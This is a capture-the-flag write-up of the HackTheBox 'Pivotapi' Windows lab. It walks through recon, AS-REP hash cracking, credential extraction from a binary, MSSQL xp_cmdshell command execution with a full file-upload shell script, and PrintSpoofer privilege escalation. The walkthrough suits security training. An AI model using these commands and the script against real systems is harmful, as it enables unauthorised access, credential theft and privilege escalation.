Posts Hackthebox Pivotapi writeup
Post
Cancel

Hackthebox Pivotapi writeup

Introduction@Pivotapi:~$

Column Details
Name Pivotapi
IP 10.10.10.240
Points 50
Os Windows
Difficulty Insane
Creator CyberVaca & 3v4Si0N
Out On 08 May 2021

Pwned

Recon

Nmap

┌───[us-free-1]─[10.10.14.3]─[root@parrot]─[~/Desktop/HTB/pivotapi]
└──╼ [★]$ nmap -sC -sV -oA nmap/result 10.10.10.240
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-12 23:11 CDT
Nmap scan report for 10.10.10.240
Host is up (0.084s latency).
Not shown: 986 filtered ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-19-21  03:06PM               103106 10.1.1.414.6453.pdf
| 02-19-21  03:06PM               656029 28475-linux-stack-based-buffer-overflows.pdf
| 02-19-21  12:55PM              1802642 BHUSA09-McDonald-WindowsHeap-PAPER.pdf
| 02-19-21  03:06PM              1018160 ExploitingSoftware-Ch07.pdf
| 08-08-20  01:18PM               219091 notes1.pdf
| 08-08-20  01:34PM               279445 notes2.pdf
| 08-08-20  01:41PM                  105 README.txt
|_02-19-21  03:06PM              1301120 RHUL-MA-2009-06.pdf
| ftp-syst:
|_  SYST: Windows_NT
22/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
|   3072 fa:19:bb:8d:b6:b6:fb:97:7e:17:80:f5:df:fd:7f:d2 (RSA)
|   256 44:d0:8b:cc:0a:4e:cd:2b:de:e8:3a:6e:ae:65:dc:10 (ECDSA)
|_  256 93:bd:b6:e2:36:ce:72:45:6c:1d:46:60:dd:08:6a:44 (ED25519)
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-05-13 04:12:09Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: LicorDeBellota.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
|   Target_Name: LICORDEBELLOTA
|   NetBIOS_Domain_Name: LICORDEBELLOTA
|   NetBIOS_Computer_Name: PIVOTAPI
|   DNS_Domain_Name: LicorDeBellota.htb
|   DNS_Computer_Name: PivotAPI.LicorDeBellota.htb
|   DNS_Tree_Name: LicorDeBellota.htb
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-05-13T04:06:57
|_Not valid after:  2051-05-13T04:06:57
|_ssl-date: 2021-05-13T04:12:54+00:00; +3s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: LicorDeBellota.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: PIVOTAPI; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2s, deviation: 0s, median: 2s
| ms-sql-info:
|   10.10.10.240:1433:
|     Version:
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2021-05-13T04:12:17
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.05 seconds

There is bunch of ports open.

Let's first start with ftp

FTP

There is a lot of pdf files.

┌───[us-free-1]─[10.10.14.5]─[root@parrot]─[~/Desktop/HTB/pivotapi/ftp]
└──╼ [★]$ ftp -pi 10.10.10.240
Connected to 10.10.10.240.
220 Microsoft FTP Service
Name (10.10.10.240:dedsec): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
227 Entering Passive Mode (10,10,10,240,202,100).
125 Data connection already open; Transfer starting.
02-19-21  03:06PM               103106 10.1.1.414.6453.pdf
02-19-21  03:06PM               656029 28475-linux-stack-based-buffer-overflows.pdf
02-19-21  12:55PM              1802642 BHUSA09-McDonald-WindowsHeap-PAPER.pdf
02-19-21  03:06PM              1018160 ExploitingSoftware-Ch07.pdf
08-08-20  01:18PM               219091 notes1.pdf
08-08-20  01:34PM               279445 notes2.pdf
08-08-20  01:41PM                  105 README.txt  
02-19-21  03:06PM              1301120 RHUL-MA-2009-06.pdf
226 Transfer complete.
ftp> mget *

Let's first cat the README.txt file.

Pivotapi.htb

It's said that change the download mode into binary so no files will be corrupted.

Let's download all files again in binary mode.

┌───[us-free-1]─[10.10.14.5]─[root@parrot]─[~/Desktop/HTB/pivotapi/ftp]
└──╼ [★]$ ftp -pi 10.10.10.240
Connected to 10.10.10.240.
220 Microsoft FTP Service
Name (10.10.10.240:dedsec): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
227 Entering Passive Mode (10,10,10,240,202,149).
150 Opening ASCII mode data connection.
02-19-21  03:06PM               103106 10.1.1.414.6453.pdf
02-19-21  03:06PM               656029 28475-linux-stack-based-buffer-overflows.pdf
02-19-21  12:55PM              1802642 BHUSA09-McDonald-WindowsHeap-PAPER.pdf
02-19-21  03:06PM              1018160 ExploitingSoftware-Ch07.pdf
08-08-20  01:18PM               219091 notes1.pdf
08-08-20  01:34PM               279445 notes2.pdf
08-08-20  01:41PM                  105 README.txt
02-19-21  03:06PM              1301120 RHUL-MA-2009-06.pdf
226 Transfer complete.
ftp> binary
200 Type set to I.
ftp> mget *

After analizing all the files i found nothing so let's check the metadata of one of the file with exiftool.

Pivotapi.htb

We found the username. let's collect all usernames for every files.

┌───[us-free-1]─[10.10.14.5]─[root@parrot]─[~/Desktop/HTB/pivotapi/ftp]
└──╼ [★]$ exiftool * | egrep -i "Creator|Author" | awk '{print $3}'
Microsoft
Unknown
saif
Microsoft®
byron
:
byron
cairo
Kaorz
:
alex
alex

Let's save all these username into a file called user.lst.

┌───[us-free-1]─[10.10.14.5]─[root@parrot]─[~/Desktop/HTB/pivotapi]
└──╼ [★]$ cat user.lst 
Microsoft
Unknown
saif
Microsoft®
byron
byron
cairo
Kaorz
alex
alex

Now we have the users list let's check the Kerberos preauthentication check.

┌───[us-free-1]─[10.10.14.5]─[root@parrot]─[~/Desktop/HTB/pivotapi]
└──╼ [★]$ GetNPUsers.py -dc-ip 10.10.10.240 -no-pass -usersfile user.lst LicorDeBellota/
Impacket v0.9.23.dev1+20210416.153120.efbe78bb - Copyright 2020 SecureAuth Corporation

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$Kaorz@LICORDEBELLOTA:27b3349940bbeb5a2c96374dc1e4e25b$ddd8d8991d1461c49db16544b9f6b9319dba02124d8949b8d6952168d6e42fa2b7604392e2f90424b2b2608acc5e1ef80d75b830a0775701ab7360831acf0a7ba59fe0169ca031cd8619939f40c7456264a14fcb53599b9308e976ac4792d678913a56b6cf59dac1c3d35ee1213b16b74117b73ba63c3d3c5270ae974d47cbd908ef3531e641bdb0d165f61288a24a000b5c099f1331cf32b94a4f0a3c8ae295ed71be38be1a90fec0e801337d188d0a23218b18abc87d535b34872dc5d3cb0f74783e997bee4bbe089e83a61951928f54c58b616ded955da935b839d9ef0b5c5a6a204bd87961273e4b7a2ad9ad4037825ca2e7
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

We got the hash of Kaorz user let's try to crack this hash with john.

┌───[us-free-1]─[10.10.14.5]─[root@parrot]─[~/Desktop/HTB/pivotapi]
└──╼ [★]$ vim hash
┌───[us-free-1]─[10.10.14.5]─[root@parrot]─[~/Desktop/HTB/pivotapi]
└──╼ [★]$ john hash -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Roper4155        ($krb5asrep$23$Kaorz@LICORDEBELLOTA)
1g 0:00:00:11 DONE (2021-05-12 23:39) 0.08517g/s 908865p/s 908865c/s 908865C/s Roybel01..Ronald8
Use the "--show" option to display all of the cracked passwords reliably
Session completed

We have the username and a password Roper4155 let's check the smb share if we have access of any shares.

I use crackmapexec for that.

┌───[us-free-1]─[10.10.14.5]─[root@parrot]─[~/Desktop/HTB/pivotapi]
└──╼ [★]$ crackmapexec smb 10.10.10.240 -u Kaorz -p Roper4155 --shares
SMB         10.10.10.240    445    PIVOTAPI         [*] Windows 10.0 Build 17763 x64 (name:PIVOTAPI) (domain:LicorDeBellota.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.240    445    PIVOTAPI         [+] LicorDeBellota.htb\Kaorz:Roper4155 
SMB         10.10.10.240    445    PIVOTAPI         [+] Enumerated shares
SMB         10.10.10.240    445    PIVOTAPI         Share           Permissions     Remark
SMB         10.10.10.240    445    PIVOTAPI         -----           -----------     ------
SMB         10.10.10.240    445    PIVOTAPI         ADMIN$                          Admin remota
SMB         10.10.10.240    445    PIVOTAPI         C$                              Recurso predeterminado
SMB         10.10.10.240    445    PIVOTAPI         IPC$            READ            IPC remota
SMB         10.10.10.240    445    PIVOTAPI         NETLOGON        READ            Recurso compartido del servidor de inicio de sesión 
SMB         10.10.10.240    445    PIVOTAPI         SYSVOL          READ            Recurso compartido del servidor de inicio de sesión 

We have read access of three shares. let's check the NETLOGON first.

┌───[us-free-1]─[10.10.14.5]─[root@parrot]─[~/Desktop/HTB/pivotapi/HelpDesk]
└──╼ [★]$ smbclient //10.10.10.240/NETLOGON -U kaorz%Roper4155 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Aug  8 05:42:28 2020
  ..                                  D        0  Sat Aug  8 05:42:28 2020
  HelpDesk                            D        0  Sun Aug  9 10:40:36 2020

                7779839 blocks of size 4096. 3497512 blocks available
smb: \> cd HelpDesk
smb: \HelpDesk\> ls
  .                                   D        0  Sun Aug  9 10:40:36 2020
  ..                                  D        0  Sun Aug  9 10:40:36 2020
  Restart-OracleService.exe           A  1854976  Fri Feb 19 04:52:01 2021
  Server MSSQL.msg                    A    24576  Sun Aug  9 06:04:14 2020
  WinRM Service.msg                   A    26112  Sun Aug  9 06:42:20 2020

                7779839 blocks of size 4096. 3497512 blocks available

We have three files in the HelpDesk Directory let's get these all files into our system.

smb: \HelpDesk\> get Restart-OracleService.exe
getting file \HelpDesk\Restart-OracleService.exe of size 1854976 as Restart-OracleService.exe (338.5 KiloBytes/sec) (average 338.5 KiloBytes/sec)
smb: \HelpDesk\> get "Server MSSQL.msg"
getting file \HelpDesk\Server MSSQL.msg of size 24576 as Server MSSQL.msg (67.6 KiloBytes/sec) (average 321.7 KiloBytes/sec)
smb: \HelpDesk\> get "WinRM Service.msg"
getting file \HelpDesk\WinRM Service.msg of size 26112 as WinRM Service.msg (71.8 KiloBytes/sec) (average 307.0 KiloBytes/sec)
smb: \HelpDesk\> ^C
┌───[us-free-1]─[10.10.14.5]─[root@parrot]─[~/Desktop/HTB/pivotapi/HelpDesk]
└──╼ [★]$ ls
 Restart-OracleService.exe  'Server MSSQL.msg'  'WinRM Service.msg'

Now for extracting the text inside .msg file we need msgconvert let's first install that.

sudo apt-get install libemail-outlook-message-perl libemail-sender-perl

Now let's extract the text inside .msg file.

msgconvert Server\ MSSQL.msg

Server MSSQL.msg

Date: Sun, 09 Aug 2020 11:04:14 +0000
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary=16208820270.2cBBDf6.24456
Content-Transfer-Encoding: 7bit
Subject: Server MSSQL
To: cybervaca@licordebellota.htb <cybervaca@licordebellota.htb>

Good afternoon,
Due to the problems caused by the Oracle database installed in 2010 in Windows, it has been decided to migrate to MSSQL at the beginning of 2020.
Remember that there were problems at the time of restarting the Oracle service and for this reason a program called "Reset-Service.exe" was created to log in to Oracle and restart the service.
 
Any doubt do not hesitate to contact us.
Greetings,
The HelpDesk Team

WinRM Service.msg

Date: Sun, 09 Aug 2020 11:42:20 +0000
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary=16208825850.f7f5B6.27939
Content-Transfer-Encoding: 7bit
Subject: WinRM Service
To: helpdesk@licordebellota.htb <helpdesk@licordebellota.htb>

Good afternoon. 
After the last pentest, we have decided to stop externally displaying WinRM's service. Several of our employees are the creators of Evil-WinRM so we do not want to expose this service... We have created a rule to block the exposure of the service and we have also blocked the TCP, UDP and even ICMP output (So that no shells of the type icmp are used.)
Greetings,

The HelpDesk Team

Now afer reading the both messages i known that Due to some problems by Oracle database installed in 2010 they migrate to MSSQL at the beginning of 2020.

And they also said that there was a problems at the time of restarting the Oracle service and for this reason a program called "Reset-Service.exe" was created to log in to Oracle and restart the service.

It's mean that the "Reset-Service.exe" has creads for Oracle database becuase it's need to login into oracle database and without creads it can't be possible.

And the other message tell that they stop externally displaying WinRM's service and they also created a rule to block the exposure of the service and we have also blocked the TCP, UDP and even ICMP output So that no shells of the type icmp are used.

Now let's go to my Commando-VM and analize the binary.

I already transfer the binary into my Commando-VM.

Pivotapi.htb

First let's monitor the binary with procmon so we known that what's the binary doing.

Pivotapi.htb

Pivotapi.htb

If you analize the output you find that the binary create a file inside "AppData\Local\Temp\" directory with the random name everytime and then it's delete the bat file.

So for getting that random bat file we need to stop the binary before it's delete that bat file So for that i use CMDWatcher.

Link : CMD Watcher

Select the Interactive mode and then start the monitoring and then execute the binary.

Pivotapi.htb

Click resume the process.

Pivotapi.htb

You got the bat file location go to that location in your file manager.

Pivotapi.htb

Copy both file into your desktop in any folder.

Pivotapi.htb

I copy both files inside my desktop/files folder and then resume the process.

Pivotapi.htb

Now let's analize the bat file.

Pivotapi.htb

Pivotapi.htb

Pivotapi.htb

The bat file has encrypted text which he store in c:\programdata\oracle.txt file and from that file they start the for loop which remove the spaces and write the output inside restart-service.exe binary and then delete all the files with restart-service.exe.

And we also need that file restart-service.exe because it's contain the creads of oracle-DB.

So for that we need to edit the bat file so they don't remove any file or binary.

Step 1

Remove all these if statement.

Pivotapi.htb

And add "goto correcto".

Pivotapi.htb

Step 2

Now in bottom of the file remove these del statements.

Pivotapi.htb

After removing the del statements they look like this.

Pivotapi.htb

Now we good to go open a cmd and run that bat file to create the restart-service.exe.

COMMANDO Fri 05/14/2021  7:41:07.78
C:\Users\DEDSEC\Desktop\files>dir
 Volume in drive C has no label.
 Volume Serial Number is 7EAC-CBDE

 Directory of C:\Users\DEDSEC\Desktop\files

05/14/2021  07:25 AM    <DIR>          .
05/14/2021  07:25 AM    <DIR>          ..
05/14/2021  07:39 AM         1,729,970 542B.bat
05/14/2021  07:22 AM                 0 542C.tmp
               2 File(s)      1,729,970 bytes
               2 Dir(s)  113,196,924,928 bytes free

COMMANDO Fri 05/14/2021  7:41:09.00
C:\Users\DEDSEC\Desktop\files>.\542B.bat
COMMANDO Fri 05/14/2021  7:41:59.20
C:\Users\DEDSEC\Desktop\files>

Now let's check if restart-service.exe is created or not.

Pivotapi.htb

And we got the restart-service.exe. I use API Monitor for analize this binary.

Link : API Monitor

Check all API filters on the left side.

Pivotapi.htb

Now click on monitor new process and select the binary called restart-service.exe.

Pivotapi.htb

Now we capture all the proccess and calls so let's analize this.

Pivotapi.htb

Found the username and password.

#Time of Day Thread Module API Return Value Error Duration
CreateProcessWithLogonW ( "svc_oracle", "", "#oracle_s3rV1c3!2010", 0, NULL, ""c:\windows\system32\cmd.exe" /c sc.exe stop OracleServiceXE; sc.exe start OracleServiceXE", 0, NULL, "C:\ProgramData", 0x000000000234e120, 0x0000000003f61c68 )  FALSE   1326 = The user name or password is incorrect.

svc_oracle:#oracle_s3rV1c3!2010

Pivotapi.htb

Now if you see nmap result there is a mssql port open let's try to connect with that.

┌───[us-free-1]─[10.10.14.3]─[root@parrot]─[~/Desktop/HTB/pivotapi]
└──╼ [★]$ mssqlclient.py -port 1433 svc_oracle@10.10.10.240
Impacket v0.9.23.dev1+20210416.153120.efbe78bb - Copyright 2020 SecureAuth Corporation

Password:
[*] Encryption required, switching to TLS
[-] ERROR(PIVOTAPI\SQLEXPRESS): Line 1: Login failed for user 'svc_oracle'.

Login failed! it's mean the username and password is not correct.

After that i read the Server MSSQL.msg again and i found that now they using mssql not oracle so we need to change the password from #oracle_s3rV1c3!2010 to #mssql_s3rV1c3!2020 because they migrate to MSSQL at the beginning of 2020.

And for the username i search on google for default mssql username and i found that.

Pivotapi.htb

So now the creads are sa:#mssql_s3rV1c3!2020 so now let's try to login with these creads.

┌───[us-free-1]─[10.10.14.3]─[root@parrot]─[~/Desktop/HTB/pivotapi]
└──╼ [★]$ mssqlclient.py -port 1433 sa@10.10.10.240
Impacket v0.9.23.dev1+20210416.153120.efbe78bb - Copyright 2020 SecureAuth Corporation

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: Español
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 1: Se cambió el contexto de la base de datos a 'master'.
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 1: Se cambió la configuración de idioma a Español.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL> help

     lcd {path}                 - changes the current local directory to {path}
     exit                       - terminates the server process (and this session)
     enable_xp_cmdshell         - you know what it means
     disable_xp_cmdshell        - you know what it means
     xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
     sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
     ! {cmd}                    - executes a local shell cmd
     
SQL> 

If we type help we can see that we can execute the xp_cmdshell {cmd} command let's try that.

SQL> help

     lcd {path}                 - changes the current local directory to {path}
     exit                       - terminates the server process (and this session)
     enable_xp_cmdshell         - you know what it means
     disable_xp_cmdshell        - you know what it means
     xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
     sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
     ! {cmd}                    - executes a local shell cmd
     
SQL> xp_cmdshell whoami
output                                                                             

--------------------------------------------------------------------------------   

nt service\mssql$sqlexpress                                                        

NULL                                                                               

SQL> 

We can execute command let's check the privileges we have.

SQL> xp_cmdshell whoami /priv
output                                                                             

--------------------------------------------------------------------------------   

NULL                                                                               

INFORMACIÓN DE PRIVILEGIOS                                                         

--------------------------                                                         

NULL                                                                               

Nombre de privilegio          Descripción                                       Estado          

============================= ================================================= =============   

SeAssignPrimaryTokenPrivilege Reemplazar un símbolo (token) de nivel de proceso Deshabilitado   

SeIncreaseQuotaPrivilege      Ajustar las cuotas de la memoria para un proceso  Deshabilitado   

SeMachineAccountPrivilege     Agregar estaciones de trabajo al dominio          Deshabilitado   

SeChangeNotifyPrivilege       Omitir comprobación de recorrido                  Habilitada      

SeManageVolumePrivilege       Realizar tareas de mantenimiento del volumen      Habilitada      

SeImpersonatePrivilege        Suplantar a un cliente tras la autenticación      Habilitada      

SeCreateGlobalPrivilege       Crear objetos globales                            Habilitada      

SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso      Deshabilitado   

NULL                                                                               

SQL> 

It's output in persian language let's translate it.

Privilege name                Description                                       State         

============================= ================================================= =============   

SeAssignPrimaryTokenPrivilege Replace a process-level token                     Disabled

SeIncreaseQuotaPrivilege      Adjust memory quotas for a process                Disabled  

SeMachineAccountPrivilege     Add workstations to the domain                    Disabled   

SeChangeNotifyPrivilege       Skip walkthrough check                            Enabled      

SeManageVolumePrivilege       Perform volume maintenance tasks                  Enabled      

SeImpersonatePrivilege        Impersonate a client after authentication         Enabled      

SeCreateGlobalPrivilege       Create global objects                             Enabled      

SeIncreaseWorkingSetPrivilege Increase the workspace of a process               Disabled

We have SeImpersonatePrivilege enabled let's try to privilege-escalation with this.

Link : PrintSpoofer

But the problem is we can't transfer this file directly because firewall blocks all connections.

So i search on google for script that will login us in mssql and we can also upload files inside that and i found a python script.

Link : Mssql_Shell.py

I edit the script because when we use UPLOAD command it's break.

#!/usr/bin/env python
from __future__ import print_function
import _mssql
import base64
import shlex
import sys
import tqdm
import hashlib
from io import open
try: input = raw_input
except NameError: pass
from base64 import encodebytes

MSSQL_SERVER="10.10.10.240"
MSSQL_USERNAME = "sa"
MSSQL_PASSWORD = "#mssql_s3rV1c3!2020"
BUFFER_SIZE = 5*1024
TIMEOUT = 30


def process_result(mssql):
    username = ""
    computername = ""
    cwd = ""
    rows = list(mssql)
    for row in rows[:-3]:
        columns = list(row)
        if row[columns[-1]]:
            print(row[columns[-1]])
        else:
            print()
    if len(rows) >= 3:
        (username, computername) = rows[-3][list(rows[-3])[-1]].split('|')
        cwd = rows[-2][list(rows[-3])[-1]]
    return (username.rstrip(), computername.rstrip(), cwd.rstrip())


def upload(mssql, stored_cwd, local_path, remote_path):
    print("Uploading "+local_path+" to "+remote_path)
    cmd = 'type nul > "' + remote_path + '.b64"'
    mssql.execute_query("EXEC xp_cmdshell '"+cmd+"'")

    with open(local_path, 'rb') as f:
        data = f.read()
        md5sum = hashlib.md5(data).hexdigest()
        b64enc_data = b"".join(base64.b64encode(data).split()).decode()

    print("Data length (b64-encoded): "+str(len(b64enc_data)/1024)+"KB")
    for i in tqdm.tqdm(range(0, len(b64enc_data), BUFFER_SIZE), unit_scale=BUFFER_SIZE/1024, unit="KB"):
        cmd = 'echo '+b64enc_data[i:i+BUFFER_SIZE]+' >> "' + remote_path + '.b64"'
        mssql.execute_query("EXEC xp_cmdshell '"+cmd+"'")
        #print("Remaining: "+str(len(b64enc_data)-i))

    cmd = 'certutil -decode "' + remote_path + '.b64" "' + remote_path + '"'
    mssql.execute_query("EXEC xp_cmdshell 'cd "+stored_cwd+" & "+cmd+" & echo %username%^|%COMPUTERNAME% & cd'")
    process_result(mssql)
    cmd = 'certutil -hashfile "' + remote_path + '" MD5'
    mssql.execute_query("EXEC xp_cmdshell 'cd "+stored_cwd+" & "+cmd+" & echo %username%^|%COMPUTERNAME% & cd'")
    if md5sum in [row[list(row)[-1]].strip() for row in mssql if row[list(row)[-1]]]:
        print("MD5 hashes match: " + md5sum)
    else:
        print("ERROR! MD5 hashes do NOT match!")


def shell():
    mssql = None
    stored_cwd = None
    try:
        mssql = _mssql.connect(server=MSSQL_SERVER, user=MSSQL_USERNAME, password=MSSQL_PASSWORD)
        print("Successful login: "+MSSQL_USERNAME+"@"+MSSQL_SERVER)

        print("Trying to enable xp_cmdshell ...")
        mssql.execute_query("EXEC sp_configure 'show advanced options',1;RECONFIGURE;exec SP_CONFIGURE 'xp_cmdshell',1;RECONFIGURE")

        cmd = 'echo %username%^|%COMPUTERNAME% & cd'
        mssql.execute_query("EXEC xp_cmdshell '"+cmd+"'")
        (username, computername, cwd) = process_result(mssql)
        stored_cwd = cwd
        
        while True:
            cmd = input("CMD "+username+"@"+computername+" "+cwd+"> ").rstrip("\n").replace("'", "''")
            if not cmd:
                cmd = "call" # Dummy cmd command
            if cmd.lower()[0:4] == "exit":
                mssql.close()
                return
            elif cmd[0:6] == "UPLOAD":
                upload_cmd = shlex.split(cmd, posix=False)
                if len(upload_cmd) < 3:
                    upload(mssql, stored_cwd, upload_cmd[1], stored_cwd+"\\"+upload_cmd[1])
                else:
                    upload(mssql, stored_cwd, upload_cmd[1], upload_cmd[2])
                cmd = "echo *** UPLOAD PROCEDURE FINISHED ***"
            mssql.execute_query("EXEC xp_cmdshell 'cd "+stored_cwd+" & "+cmd+" & echo %username%^|%COMPUTERNAME% & cd'")
            (username, computername, cwd) = process_result(mssql)
            stored_cwd = cwd
            
    except _mssql.MssqlDatabaseException as e:
        if  e.severity <= 16:
            print("MSSQL failed: "+str(e))
        else:
            raise
    finally:
        if mssql:
            mssql.close()


shell()
sys.exit()

Now let's run the script.

Pivotapi.htb

┌───[us-free-1]─[10.10.14.3]─[root@parrot]─[/opt/printspoofer]
└──╼ [★]$ python dedsec.py 
/opt/printspoofer/dedsec.py:3: DeprecationWarning: Using or importing the ABCs from 'collections' instead of from 'collections.abc' is deprecated since Python 3.3, and in 3.10 it will stop working
  import _mssql
Successful login: sa@10.10.10.240
Trying to enable xp_cmdshell ...
CMD MSSQL$SQLEXPRESS@PIVOTAPI C:\Windows\system32> whoami
nt service\mssql$sqlexpress
CMD MSSQL$SQLEXPRESS@PIVOTAPI C:\Windows\system32> 

We got the shell now let's try to UPLOAD the file inside TEMP directory.

┌───[us-free-1]─[10.10.14.3]─[root@parrot]─[/opt/printspoofer]
└──╼ [★]$ python dedsec.py 
/opt/printspoofer/dedsec.py:2: DeprecationWarning: Using or importing the ABCs from 'collections' instead of from 'collections.abc' is deprecated since Python 3.3, and in 3.10 it will stop working
  import _mssql
Successful login: sa@10.10.10.240
Trying to enable xp_cmdshell ...
CMD MSSQL$SQLEXPRESS@PIVOTAPI C:\Windows\system32> cd /temp
CMD MSSQL$SQLEXPRESS@PIVOTAPI C:\temp> UPLOAD PrintSpoofer.exe C:\TEMP\printspoofer.exe
Uploading PrintSpoofer.exe to C:\TEMP\printspoofer.exe
Data length (b64-encoded): 35.3359375KB
100%|█████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 40.0/40.0 [00:01<00:00, 24.50KB/s]
Longitud de entrada = 36208
EncodeToFile devolvi¾ Este archivo ya existe. 0x80070050 (WIN32: 80 ERROR_FILE_EXISTS)
CertUtil: -decode error del comando: 0x80070050 (WIN32: 80 ERROR_FILE_EXISTS)
CertUtil: Este archivo ya existe.
MD5 hashes match: 755af01d6f1c793d28275ec8b914687c
*** UPLOAD PROCEDURE FINISHED *** 
CMD MSSQL$SQLEXPRESS@PIVOTAPI C:\temp> 

Now let's run the binary and get our user.txt and root.txt.

CMD MSSQL$SQLEXPRESS@PIVOTAPI C:\temp> printspoofer.exe -i -c "powershell -c type C:\Users\3v4Si0N\Desktop\user.txt"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
4855ef51169f74e4d5d79befd933d719
CMD MSSQL$SQLEXPRESS@PIVOTAPI C:\temp> 
CMD MSSQL$SQLEXPRESS@PIVOTAPI C:\temp> printspoofer.exe -i -c "powershell -c type C:\users\cybervaca\Desktop\root.txt"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
b32c5e3ee389ee920f6aa1efa025048d
CMD MSSQL$SQLEXPRESS@PIVOTAPI C:\temp> 

And we pwned it …….

Complete

If u liked the writeup.Support a Student to Get the OSCP-Cert Donation for OSCP

Resources

Topic Url
CMD Watcher https://www.kahusecurity.com/tools.html
API Monitor http://www.rohitab.com/apimonitor
PrintSpoofer https://github.com/dievus/printspoofer
Mssql_Shell.py https://github.com/Alamot/code-snippets/blob/master/mssql/mssql_shell.py
This post is licensed under CC BY 4.0

Hackthebox Atom writeup

Fortress Monitors writeup